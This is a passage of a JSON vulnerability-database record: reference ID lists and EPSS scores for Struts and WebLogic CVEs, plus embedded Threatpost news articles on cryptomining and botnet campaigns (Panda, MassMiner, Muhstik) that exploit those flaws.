"THREATPOST:555BCC102B10B8C6CABB0054595AC756", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E415CA5BCD7AC520A44AB5246664528A", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29395", "1337DAY-ID-29668", "1337DAY-ID-32626", "1337DAY-ID-32663"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "STRUTS_OGNL", "WINPCAP"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088", "CPAI-2019-0546"]}, {"type": "cisa", "idList": ["CISA:6D325600F427E8426F81E5829305E20F"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:43458", "EDB-ID:43924"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["20E0E007-A9C4-58EA-917F-E225D8785B3F", "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "2ED15233-2A01-53F8-A939-8A4D06481CF4", "4F4AF4AC-0953-5098-98D6-592B918B0836", "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "D2931851-B196-5CD6-AF75-B24EA22F6115", "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "F0C27A65-B942-5D87-B7D9-08451A15456C"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2017"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "symantec", "idList": ["SMNTC-108822"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29668"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-10271", "epss": "0.975240000", "percentile": "0.999740000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}, {"cve": "CVE-2019-2725", "epss": "0.975500000", "percentile": "0.999900000", "modified": "2023-03-14"}], "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1683996360, "epss": 1678882283}, "_internal": {"score_hash": "f1e89bd5a11829f12f4b42f95fe9be13"}}

{"threatpost": [{"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. There are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. \u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious 